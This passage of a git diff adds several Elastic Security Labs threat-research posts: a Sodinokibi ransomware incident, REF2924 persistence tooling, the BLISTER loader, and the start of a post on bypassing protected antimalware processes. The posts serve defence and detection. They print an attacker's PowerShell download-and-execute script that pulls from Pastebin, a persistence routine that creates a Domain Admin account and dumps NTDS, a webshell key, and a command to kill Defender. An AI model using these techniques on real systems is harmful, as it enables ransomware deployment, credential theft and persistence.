For example, we can kill the descendant process when it establishes a network connection, which would prevent additional malicious code from being downloaded or command and control activity.\n\n\n\nElastic Endpoint Security ships with hundreds of our own behavior-based analytics that include ways to detect and prevent abnormal process relationships involving third-party administrative tools or binaries that are native to the Windows, macOS, or Linux operating systems.\n\n## Analysis of adversary tradecraft\n\nThe PowerShell script that was executed checked the processor architecture before utilizing the .NET WebClient class to download content from Pastebin and the Invoke-Expression (IEX) cmdlet to execute code. This is a popular technique amongst adversaries for downloading and executing code via PowerShell.\n\nPastebin is a plain text hosting and sharing service where legitimate users often share code snippets. However, malicious actors utilize Pastebin and similar websites to store malicious code or publish leaked credentials.\n\n```\nIf ($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64') {\n Start-Process -FilePath \"$Env:WINDIR\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -argument \"IEX ((new-object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));Invoke-LJJJIWVSRIMKPOD;Start-Sleep -s 1000000;\"\n} else {\n IEX ((new-object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));\n Invoke-LJJJIWVSRIMKPOD;\n Start-Sleep -s 1000000;\n}\n```\n\n_PowerShell script that downloaded content1 from pastebin.com_\n\nThis behavior is often categorized as a fileless or in-memory attack due to zero or minimal disk activity that occurs on the endpoint. When the Elastic Endpoint Security agent detects a fileless attack, it automatically collects and extracts the staged injected code and strings.
This feature ensured that we had full visibility into the behavior being prevented.\n\nSearching [VirusTotal](https://www.virustotal.com/) for some of the collected strings surfaced several specimens from the Sodinokibi ransomware family.\n\nThe following specific toolmarks and behaviors indicate that this activity is consistent with the execution of the Sodinokibi or Gandcrab ransomware specimens as reported by [BleepingComputer](https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-spreads-wide-via-hacked-msps-sites-and-spam/) and [Cynet](https://www.cynet.com/blog/ransomware-never-dies-analysis-of-new-sodinokibi-ransomware-variant/):\n\n- The malicious actor utilized ScreenConnect remote desktop support software to connect from a compromised MSP to the target enterprise.\n- ScreenConnect was used to copy a batch script to the endpoints, which contained a PowerShell script to download and inject malicious code from Pastebin.\n- The PowerShell script contained cmdlets and strings (e.g., Invoke-LJJJIWVSRIMKPOD and Start-Sleep) that have been observed in other Sodinokibi ransomware campaigns.\n- The strings that were collected from the injected threads are consistent with Sodinokibi ransomware samples that were submitted to VirusTotal within the last 24 hours.\n\nAfter the adversary’s attempt to self-inject shellcode and execute ransomware was prevented, their attack on the initial endpoint stopped. After a period of 15 minutes, the adversary returned and attempted to execute the same procedures on an additional five endpoints before giving up. All of their attempts to deploy ransomware were prevented.\n\n## Conclusion\n\nIn this post, we discussed a real-world case of a malicious actor abusing trusted relationships between an MSP and its customers and attempting to deploy ransomware. 
This highlights the importance of understanding the relationships that your organization has with third parties and the potential impact if those connections are abused.\n\nAnalyzing the alerts revealed that the adversary connected to the customer’s environment via remote desktop support software and executed a malicious script with the intention of downloading, injecting, and executing ransomware. All of the adversary’s attempts were prevented.\n\nThis case also demonstrates the importance of having a layered approach to security and being able to detect and prevent adversary behavior and fileless attacks. We dissected the attacker’s procedures and showed how EQL and Reflex can be used to create custom rules and responses.\n\nLooking only for malicious files is not enough; Elastic Endpoint Security provides several layers of behavior-based protections against ransomware, fileless attacks, phishing, exploits, and adversary behavior.\n\n[EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581).\n\n_1 — The content has since been removed from Pastebin by its creator or the Pastebin staff_\n"
+ },
+ "title": "Ransomware, interrupted: Sodinokibi and the supply chain",
+ "slug": "ransomware-interrupted-sodinokibi-and-the-supply-chain",
+ "date": "2022-06-02",
+ "description": "Learn how Elastic Endpoint Security's behavior-based protections prevented a targeted ransomware attack on multiple endpoints.",
+ "author": [
+ {
+ "slug": "david-french"
+ }
+ ],
+ "image": "ransomware-prevention-blog-thumbnail.jpg",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ]
+ },
+ "id": "security_labs_content-ransomware_interrupted_sodinokibi_and_the_supply_chain-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ref2924_howto_maintain_persistence_as_an_advanced_threat-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ref2924_howto_maintain_persistence_as_an_advanced_threat-md.json
new file mode 100644
index 00000000000..0490a9af493
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ref2924_howto_maintain_persistence_as_an_advanced_threat-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"REF2924: how to maintain persistence as an (advanced?) threat\"\nslug: \"ref2924-howto-maintain-persistence-as-an-advanced-threat\"\ndate: \"2023-03-27\"\ndescription: \"Elastic Security Labs describes new persistence techniques used by the group behind SIESTAGRAPH, NAPLISTENER, and SOMNIRECORD.\"\nauthor:\n - slug: remco-sprooten\nimage: \"blog-thumb-pink-grapefruit-outlier.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - ref2924\n - siestagraph\n - naplistener\n - somnirecord\n---\n\n## Preamble\n\nIn recent months, there has been a noticeable shift in the nature of the incidents being tracked under REF2924. Initially, the attacker employed custom, purpose-built malware. As the attack evolved, we observed the same group resorting to the use of open source tools or publicly available source code as a basis for developing new capabilities.\n\n### Key takeaways\n\n- The attacker has shifted from using custom malware to open source tools or publicly available source code to develop new capabilities.\n\n - The attacker has also deployed open source tools like TFirewall and AdFind in the victim's environment.\n - In order to maintain persistence, the attacker has deployed multiple different tools and techniques.\n\n### .NET Webshell\n\nOn February 16th, 2023, Elastic Security Labs observed the Microsoft .NET compiler ( `csc.exe` ) being used to compile a DLL file. The output was identified by [Elastic Defend](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg) as a malicious file.
Analysts who may have observed dynamic runtime compilation of .NET web shells should note that this was performed by the operator, not automatically by the system.\n\n\n\nThe resulting output file was named `App_Web_lgntop.aspx.ec688436.pkx46see.dll` (a50ca8df4181918fe0636272f31e19815f1b97cce6d871e15e03b0ee0e3da17b) and was the subject of malware analysis.\n\n#### Analysis\n\nThe web shell requires a small amount of pre-configuration to ensure it listens for the correct URI. In this case the path will be \" `~/auth/Current/themes/resources/lgntop.aspx`\".\n\n\n\nThis path is expected on Microsoft Exchange Outlook Web Access (OWA) sites, so it was likely selected to blend in with the OWA service that is running on the target server. Once a web request is received it is processed by the following method.\n\n\n\nThis method checks if a specific HTTP header named `XFF` is present in the request headers. If it is present and its value, after passing through an MD5 hash function and a substring function, matches the string \" `19267E61029B4546`\", then the method proceeds to execute the rest of the code. The string is likely used as an authentication key to prevent others from using the webshell.\n\nWithin the `if` statement, the method reads the binary data from the request body using the `BinaryRead` method and stores it in a byte array. It then creates a string containing the fully qualified name of a .NET type that the code wants to load and gets a reference to that type using the `Type.GetType` method. The byte array in the image is the ASCII code representation of the text “ `System.Reflection.Assembly` ”. This way of presenting the code is done in order to avoid string-based detection. The `System.Reflection.Assembly` class provides methods and properties to load, examine, and manipulate assemblies at runtime.\n\nThe code obtains a reference to a method named `Load` in the loaded type and invokes it using the `Invoke` method. 
The `Load` method takes a byte array as a parameter, which the code decrypts using a `Decrypt` method (not shown in this publication). The result of the `Load` method invocation is stored in an object variable.\n\nThe code then gets a reference to another method named `CreateInstance` in the loaded type and invokes it using the `Invoke` method. The `CreateInstance` method takes a string as a parameter, which the code constructs from a byte array containing the ASCII codes for the string U. The result of the `CreateInstance` method invocation is stored in an object variable.\n\nFinally, the code calls the `Equals` method on the object, passing in the current object. Because `Equals` will call `GetType` on the object, this approach is a way to indirectly call functions covertly.\n\nThe `Encrypt` and `Decrypt` functions include a hard-coded key.\n\n\n\n#### Sources\n\nThe key \" `e45e329feb5d925b`\" is the result of taking the first half of the MD5 hash of the string \"rebeyond\", the handle of the developer of the [Behinder](https://github.com/rebeyond/Behinder) webshell framework. This key is also the default value when you generate a shell template using the Behinder or derivative [Godzilla](https://github.com/BeichenDream/Godzilla) webshell frameworks.\n\n### Persistence module\n\nOn February 13, 2023, we observed a new persistent malware called `kavUpdate.exe` written in .NET with an exceptionally small footprint (about 6 KB compiled). We believe this software was developed specifically for this environment by the threat actor. Elastic Security Labs observed this binary persisting via a Scheduled Task, though other mechanisms would likely be compatible.\n\n#### Analysis\n\n\n\nThis code is designed with the sole purpose of executing a set of predefined commands.
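As a quick aside on the web shell key discussed above, the relationship between "rebeyond" and the default key is easy to verify with a few lines of Python:

```python
import hashlib

# Behinder's default key is the first half (16 hex chars) of MD5("rebeyond"),
# "rebeyond" being the handle of the framework's developer.
key = hashlib.md5(b"rebeyond").hexdigest()[:16]
print(key)  # e45e329feb5d925b
```

Back to the `kavUpdate.exe` persistence module.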
The malware checks the current day and hour, and if it is Monday or Thursday at 5am, it will execute a series of commands:\n\n1. Delete the user 'norshasa'\n2. Add the user 'norshasa' with the password 'P@ssw0rd123...'\n3. Activate the user 'norshasa'\n4. Add the user 'norshasa' to the Domain Admins group\n5. Add the user 'norshasa' to the Remote Desktop Users group\n6. Create a full backup of NTDS in the `C:\\ProgramData\\temp` folder\n7. On the same days of the week, one hour later at 6am, delete the user 'norshasa'.\n\n### Open source tools\n\nOn January 2nd, 2023 the threat actor deployed [TFirewall](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg) in the victim's environment. TFirewall is a testing tool designed to evaluate whether hosts can establish a SOCKS5 proxy within an intranet environment while allowing for outbound network communication through specific ports. Developed using Golang, TFirewall comprises a client and server component and is compatible with multiple operating systems.\n\nAlong with TFirewall, we observed that the attacker used the free tool [AdFind](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image1.png). `AdFind` is a command line utility for querying Active Directory and other directory services. AdFind can be run on Windows 7 or newer and requires no special security permissions beyond the ability to launch executables. It’s written in C++ and compiled with Visual Studio 2022. The source code is not available.\n\nThe binary is [quickly identifiable](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg) based on its hash (114b37df703d46a44de0bc96afab8b8590e59a3c389558dd531298e5dd275acb). During execution, we recognized the use of AdFind-specific command line flags and parameters:\n\n\n\nOn March 6th, 2023 we observed a process named `nat.exe`. Initially, the file was only identified as generically malicious.
However, if we take a closer look at the command line parameters that are used during execution, we have a hint for which tool the attacker is using.\n\n\n\nBased on these arguments, we can safely conclude it's a packed version of the Impacket tool [secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py). Impacket contains a collection of Python classes for working with network protocols. Impacket is commonly used to carry out a variety of tasks related to network security and penetration testing, though it may also be abused by threat actors.\n\nUsing the same approach (examining the command line parameters), we identified the use of the tool called [NTDSDumpEx](https://github.com/zcgonvh/NTDSDumpEx) which exhibited the same command line arguments employed by this tool:\n\n\n\n`NTDSDumpEx` is capable of extracting data from the Active Directory NTDS.dit database in its offline state, meaning the database does not have to be running. It can extract information such as user accounts, group memberships, access control lists, and other directory objects.\n\n### Background\n\nThroughout the attack we witnessed a combination of TTPs that provide a recognizable fingerprint. For example, the way the attacker exported mailboxes is described in detail in [this](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8EExchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%92%8C%E5%AF%BC%E5%87%BA%E9%82%AE%E4%BB%B6) blog post. We also see a strong resemblance in the way credentials from LSASS are being exported, as described [here](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8Elsass.exe%E8%BF%9B%E7%A8%8B%E5%AF%BC%E5%87%BA%E5%87%AD%E6%8D%AE). 
The majority of the commands and tools deployed by the attacker are well described on the same GitHub users’ [tips](https://github.com/3gstudent/Pentest-and-Development-Tips) repository.\n\nWe also note that the technique used to deploy NAPLISTENER is described [here](https://3gstudent.github.io/%E5%88%A9%E7%94%A8IIS%E7%9A%84%E7%AB%AF%E5%8F%A3%E5%85%B1%E4%BA%AB%E5%8A%9F%E8%83%BD%E7%BB%95%E8%BF%87%E9%98%B2%E7%81%AB%E5%A2%99) and the deployment method for malicious IIS modules like DOORME can be found in [this](https://3gstudent.github.io/%E5%88%A9%E7%94%A8IIS%E7%9A%84%E6%A8%A1%E5%9D%97%E5%8A%9F%E8%83%BD%E7%BB%95%E8%BF%87%E9%98%B2%E7%81%AB%E5%A2%99) blog post. And lastly, a [post](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Exchange%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%90%8E%E9%97%A8%E7%9A%84%E6%89%A9%E5%B1%95) on Godzilla and Behinder web shells in exchange servers closely reflects how these capabilities were implemented within targeted environments.\n\nDuring malware analysis of the SIESTAGRAPH, NAPLISTENER, and SOMNIRECORD families, we also identified open source repositories that minimally served as the inspiration for these payloads and which have been described in other publications from Elastic Security Labs.\n\nWe conclude that the attackers are at the very least regular consumers of blogs and open source repositories, both of which have contributed to the rapid pace of this threat’s activities.\n\n### Detection logic\n\nThe following prebuilt protections are available from Elastic: - [AdFind Command Activity](https://www.elastic.co/guide/en/security/current/adfind-command-activity.html)\n\n### YARA\n\nElastic Security has created YARA rules to identify this activity. 
Below are YARA rules to identify the Behinder web shell.\n\n```\nrule Windows_Trojan_Behinder {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-03-02\"\n last_modified = \"2023-03-02\"\n description = \"Web shell found in REF2924, related to Behinder or Godzilla\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Behinder\"\n threat_name = \"Windows.Trojan.Behinder\"\n license = \"Elastic License v2\"\n reference_sample = \"a50ca8df4181918fe0636272f31e19815f1b97cce6d871e15e03b0ee0e3da17b\"\n strings:\n $load = { 53 79 73 74 65 6D 2E 52 65 66 6C 65 63 74 69 6F 6E 2E 41 73 73 65 6D 62 6C 79 }\n $key = \"e45e329feb5d925b\" ascii wide\n condition:\n all of them\n}\n```\n"
+ },
+ "title": "REF2924: how to maintain persistence as an (advanced?) threat",
+ "slug": "ref2924-howto-maintain-persistence-as-an-advanced-threat",
+ "date": "2023-03-27",
+ "description": "Elastic Security Labs describes new persistence techniques used by the group behind SIESTAGRAPH, NAPLISTENER, and SOMNIRECORD.",
+ "author": [
+ {
+ "slug": "remco-sprooten"
+ }
+ ],
+ "image": "blog-thumb-pink-grapefruit-outlier.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "ref2924",
+ "siestagraph",
+ "naplistener",
+ "somnirecord"
+ ]
+ },
+ "id": "security_labs_content-ref2924_howto_maintain_persistence_as_an_advanced_threat-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-revisiting_blister_new_developments_of_the_blister_loader-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-revisiting_blister_new_developments_of_the_blister_loader-md.json
new file mode 100644
index 00000000000..2e74e8b7ea7
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-revisiting_blister_new_developments_of_the_blister_loader-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Revisiting BLISTER: New development of the BLISTER loader\"\nslug: \"revisiting-blister-new-developments-of-the-blister-loader\"\ndate: \"2023-08-24\"\ndescription: \"Elastic Security Labs dives deep into the recent evolution of the BLISTER loader malware family.\"\nauthor:\n - slug: salim-bitam\n - slug: daniel-stepanic\nimage: \"cracked-lava.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - blister\n - malware\n - ref7890\n---\n\n## Preamble\n\nIn a fast-paced and ever-changing world of cybercrime threats, the tenacity and adaptability of malicious actors is a significant concern. BLISTER, a malware loader initially [discovered](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign) by Elastic Security Labs in 2021 and associated with financially-motivated intrusions, is a testament to this trend as it continues to develop additional capabilities. Two years after its initial discovery, BLISTER continues to receive updates while flying under the radar, gaining momentum as an emerging threat. 
Recent findings from Palo Alto’s [Unit 42](https://twitter.com/Unit42_Intel/status/1684583246032506880) describe an updated [SOCGHOLISH](https://redcanary.com/threat-detection-report/threats/socgholish/) infection chain used to distribute BLISTER and deploy a payload from [MYTHIC](https://github.com/its-a-feature/Mythic), an open-source Command and Control (C2) framework.\n\n## Key takeaways\n\n - Elastic Security Labs has observed the BLISTER loader ramping up with new changes and ongoing development, with signs of imminent threat activity\n - The latest BLISTER update includes a keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments\n - BLISTER now integrates techniques to remove any process instrumentation hook and has modified its configuration across multiple revisions, now encompassing additional fields and flags.\n\n## Overview\n\nOur research uncovered new functionality that was previously absent within the BLISTER family, indicating ongoing development. However, the malware authors continue to use a distinctive technique of embedding malicious code in otherwise legitimate applications. This approach superficially appears successful, given the low rates of detection for many vendors as seen in VirusTotal. The significant amount of benign code and use of encryption to protect the malicious code are likely two factors impacting detection.\n\n\n\nRecently, Elastic Security Labs has observed many new BLISTER loaders in the wild. After analyzing various samples, it’s clear that the malware authors have made some changes and have been watching the antivirus industry closely. 
In one [sample](https://www.virustotal.com/gui/file/b4f37f13a7e9c56ea95fa3792e11404eb3bdb878734f1ca394ceed344d22858f) from early June, we can infer that the authors were testing with a non-production loader that displays a message box containing the string “Test”.\n\n\n\nReaders can see a disassembled view of this functionality below.\n\n\n\nBy the end of July, we observed campaigns involving a new BLISTER loader that targeted victim organizations to deploy the MYTHIC implant.\n\n\n\nAt the time of this writing, Elastic Security Labs is seeing a stream of BLISTER samples which deploy MYTHIC and have very low rates of detection. \n\n\n\n## Comparative analyses\n\n### Smuggling malicious code\n\nThe authors behind BLISTER employ a consistent strategy of embedding BLISTER's malicious code within a legitimate library. The most recent variants of this loader have targeted the [VLC](https://www.videolan.org/vlc/) Media Player library to smuggle their malware into victim environments. This blend of benign and malicious code seems effective at defeating some kinds of machine-learning models.\n\n\n\nThe following is a comparison between a legitimate VLC DLL and one that is infected with BLISTER’s code. In the infected sample, the entry point that references malicious code has been indicated in red. This methodology is similar to prior BLISTER variants.\n\n\n\n### Different hashing algorithm\n\nOne of the changes implemented since our last [write-up](https://www.elastic.co/security-labs/blister-loader) is the adoption of a different hashing algorithm used in the core and in the loader part of BLISTER. While the previous version used simple logic to shift bytes, this new version includes a hard-coded seed with XOR and multiplication operations. 
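The described shape — a hard-coded seed combined with per-byte XOR and multiplication — corresponds to a common family of string-hashing loops. The Python sketch below illustrates that general shape only; the seed and multiplier shown are arbitrary placeholders (FNV-1a's well-known constants), not BLISTER's actual values:

```python
def api_hash(name: bytes, seed: int = 0x811C9DC5, mult: int = 0x01000193) -> int:
    """Generic seeded XOR-multiply string hash (FNV-1a-style shape).
    The seed and multiplier are illustrative placeholders, not the
    constants used by BLISTER."""
    h = seed
    for b in name:
        h ^= b                        # mix in one byte
        h = (h * mult) & 0xFFFFFFFF   # multiply and truncate to 32 bits
    return h

# A loader built this way resolves APIs by comparing such hashes
# rather than storing plaintext names.
print(hex(api_hash(b"GetComputerNameExW")))
```

Because the whole loop collapses to a handful of arithmetic operations with new constants, a signature keyed to the previous byte-shifting logic no longer matches, which is consistent with the evasion motive discussed here.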
Researchers speculate that changing the hashing approach helps to evade antimalware products that rely on YARA signatures.\n\n\n\n### Configuration retrieval\n\nAfter decrypting its malicious code, the BLISTER loader employs an identical memory scanning method to identify the configuration data blob. This is accomplished by searching for a predetermined, hardcoded memory pattern. A notable contrast from the earlier iteration of BLISTER lies in the fact that the configuration is now decrypted in conjunction with the core code, rather than being treated as a separate entity.\n\n### Environmental keying\n\nA recent addition to BLISTER is the capability to exclusively execute on designated machines. This behavior is activated by configuring the appropriate flag within the malware’s configuration. Subsequently, the malware proceeds to extract the machine's domain name using the `GetComputerNameExW` Windows API. Following this, the domain name is hashed using the previously mentioned algorithm, and the resulting hash is then compared to a hash present in the configuration. This functionality is presumably deployed for the purpose of targeted attacks or for testing scenarios, ensuring that the malware refrains from infecting unintended systems such as those employed by malware researchers.\n\n\n\nOne of the few malware analysis tools capable of quickly exposing this behavior is the awesome [Tiny Tracer](https://github.com/hasherezade/tiny_tracer) utility by [hasherezade](https://twitter.com/hasherezade). We’ve included an excerpt from Tiny_Tracer below which captures the BLISTER process immediately terminating after the `GetComputerNameExW` validation is performed in a sandboxed analysis VM.\n\n\n\n### Time-based anti-debugging feature\n\nSimilar to its predecessors, the malware incorporates time-based anti-debugging functionality. 
However, unlike the previous versions in which the timer was hardcoded, the updated version introduces a new field in the configuration. This field enables the customization of the sleep timer, with a default value of 10 minutes. This default interval remains unchanged from prior iterations of BLISTER.\n\n\n\n### Unhook process instrumentation to detect syscalls\n\nIn this latest version, BLISTER introduces noteworthy functionality: it unhooks any ongoing process instrumentation, a [tactic](https://github.com/ionescu007/HookingNirvana/blob/master/Esoteric%20Hooks.pdf) designed to circumvent userland syscall detection mechanisms upon which certain EDR solutions are based.\n\n\n\n### BLISTER's configuration\n\nThe BLISTER configuration structure has also been changed with the latest variants. Two new fields have been added and the flag field at offset 0 has been changed from a WORD to a DWORD value. The new fields pertain to the hash of the domain for environmental keying and the configurable sleep time; these field values are at offset 4 and 12 respectively. The following is the updated structure of the configuration:\n\n\n\nChanges have also been made to the configuration flags, allowing the operator to activate different functions within the malware. Researchers have provided an updated list of functions built upon our prior research into BLISTER.\n\n\n\n## Payload extractor update\n\nIn our previous research publication, we introduced an efficient payload extractor tailored to dissect and extract the configuration and payload of the loader. 
To dissect the most recent BLISTER variants and capture these new details, we enhanced our extractor, which is available [here](https://github.com/elastic/labs-releases/tree/main/tools/blister).\n\n\n\n## Conclusion\n\n[BLISTER](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html) is one small part of the global cybercriminal ecosystem, enabling financially motivated threats to gain access to victim environments and avoid detection by security sensors. The community should consider these new developments and assess the efficacy of BLISTER detections. Elastic Security Labs will continue to monitor this threat and share actionable guidance.\n\n## Detection logic\n\n### Prevention\n\n - [Windows.Trojan.Blister](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Blister.yar)\n\n### Detection\n\n - [Windows Error Manager/Reporting Masquerading](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_windows_error_manager_reporting_masquerading.toml)\n - [Potential Operation via Direct Syscall](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_operation_via_direct_syscall.toml)\n - [Potential Masquerading as Windows Error Manager](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_windows_error_manager.toml)\n - [Unusual Startup Shell Folder Modification](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml)\n - [Potential Masquerading as VLC DLL](https://github.com/elastic/detection-rules/blob/ef432d0907548abf7699fa5d86150dc6b4133125/rules_building_block/defense_evasion_masquerading_vlc_dll.toml)\n\n### YARA\n\nElastic Security has created [YARA rules](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Blister.yar) 
to identify this activity. Below is the latest rule that captures the new update to BLISTER.\n\n```yara\nrule Windows_Trojan_Blister {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-08-02\"\n last_modified = \"2023-08-08\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Blister\"\n threat_name = \"Windows.Trojan.Blister\"\n license = \"Elastic License v2\"\n strings:\n $b_loader_xor = { 48 8B C3 49 03 DC 83 E0 03 8A 44 05 48 [2-3] ?? 03 ?? 4D 2B ?? 75 }\n $b_loader_virtual_protect = { 48 8D 45 50 41 ?? ?? ?? ?? 00 4C 8D ?? 04 4C 89 ?? ?? 41 B9 04 00 00 00 4C 89 ?? F0 4C 8D 45 58 48 89 44 24 20 48 8D 55 F0 }\n condition:\n all of them\n}\n```\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n - [Execution](https://attack.mitre.org/tactics/TA0002/)\n - [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n - [Persistence](https://attack.mitre.org/tactics/TA0003/)\n\n## Techniques / Sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n - [System Binary Proxy Execution: Rundll32](https://attack.mitre.org/techniques/T1218/011/)\n - [Execution Guardrails: Environmental Keying](https://attack.mitre.org/techniques/T1480/001/)\n - [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001/)\n - [Masquerading](https://attack.mitre.org/techniques/T1036/)\n - [Process Injection: Process Hollowing](https://attack.mitre.org/techniques/T1055/012/)\n\n## References\n\nThe following were referenced throughout the above research:\n - [Palo Alto Unit42](https://twitter.com/Unit42_Intel/status/1684583246032506880?s=20)\n - 
[Trendmicro](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html)\n - [Malpedia](https://malpedia.caad.fkie.fraunhofer.de/details/win.blister)\n\n## Observables\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/blister) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Indicator | Type | Reference |\n|-----------|------|-----------|\n| 5fc79a4499bafa3a881778ef51ce29ef015ee58a587e3614702e69da304395db | sha256 | BLISTER loader DLL |\n"
+ },
+ "title": "Revisiting BLISTER: New development of the BLISTER loader",
+ "slug": "revisiting-blister-new-developments-of-the-blister-loader",
+ "date": "2023-08-24",
+ "description": "Elastic Security Labs dives deep into the recent evolution of the BLISTER loader malware family.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "cracked-lava.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "blister",
+ "malware",
+ "ref7890"
+ ]
+ },
+ "id": "security_labs_content-revisiting_blister_new_developments_of_the_blister_loader-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sandboxing_antimalware_products-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sandboxing_antimalware_products-md.json
new file mode 100644
index 00000000000..cd427dd779a
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sandboxing_antimalware_products-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Sandboxing Antimalware Products for Fun and Profit\"\nslug: \"sandboxing-antimalware-products\"\ndate: \"2023-02-21\"\ndescription: \"This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack.\"\nauthor:\n - slug: gabriel-landau\nimage: \"blog-thumb-tools-various.jpg\"\ncategory:\n - slug: security-research\n---\n\nThis article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack. This is of particular interest because we build and maintain two anti-malware products that benefit from this protection.\n\n## Protected Anti-Malware Services\n\nWindows 8.1 [introduced](https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-) a concept of Protected Antimalware Services. This enables specially-signed programs to run such that they are immune from tampering and termination, even by administrative users. Microsoft’s documentation ([archived](https://web.archive.org/web/20211019010629/https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-)) describes this as:\n\n> In Windows 8.1, a new concept of protected service has been introduced to allow anti-malware user-mode services to be launched as a protected service. After the service is launched as protected, Windows uses code integrity to only allow trusted code to load into the protected service. Windows also protects these processes from code injection and other attacks from admin processes.\n\nThe goal is to prevent malware from instantly disabling your antivirus and then running amok. For the rest of this article, we call them Protected Process Light (PPL). 
For more depth, [Alex Ionescu](https://twitter.com/aionescu) goes into great detail on protected processes in his [talk at NoSuchCon 2014](https://www.youtube.com/watch?v=35L_qJNMu1A).\n\nTo be able to run as a PPL, an anti-malware vendor must apply to Microsoft, prove their identity, sign binding legal documents, implement an [Early Launch Anti-Malware](https://docs.microsoft.com/en-us/windows/win32/w8cookbook/secured-boot) (ELAM) driver, run it through a test suite, and submit it to Microsoft for a special Authenticode signature. It is not a trivial process. Once this process is complete, the vendor can [use this ELAM driver](https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-installelamcertificateinfo) to have Windows protect their anti-malware service by running it as a PPL.\n\nYou can see PPL in action yourself by running the following from an elevated administrative command prompt on a default Windows 10 install:\n\n**Protected Process Light in Action**\n\n```\nC:\\WINDOWS\\system32>whoami\nnt authority\\system\n\nC:\\WINDOWS\\system32>whoami /priv | findstr \"Debug\"\nSeDebugPrivilege Debug programs Enabled\n\nC:\\WINDOWS\\system32>taskkill /f /im MsMpEng.exe\nERROR: The process \"MsMpEng.exe\" with PID 2236 could not be terminated.\nReason: Access is denied.\n\n```\n\nAs you can see here, even a user running as SYSTEM (or an elevated administrator) with [SeDebugPrivilege](https://devblogs.microsoft.com/oldnewthing/20080314-00/?p=23113) cannot terminate the PPL Windows Defender anti-malware Service (MsMpEng.exe). This is because non-PPL processes like taskkill.exe cannot obtain handles with the PROCESS_TERMINATE access right to PPL processes using APIs such as [OpenProcess](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess).\n\nIn summary, Windows attempts to protect PPL processes from non-PPL processes, even those with administrative rights. This is both documented and implemented. 
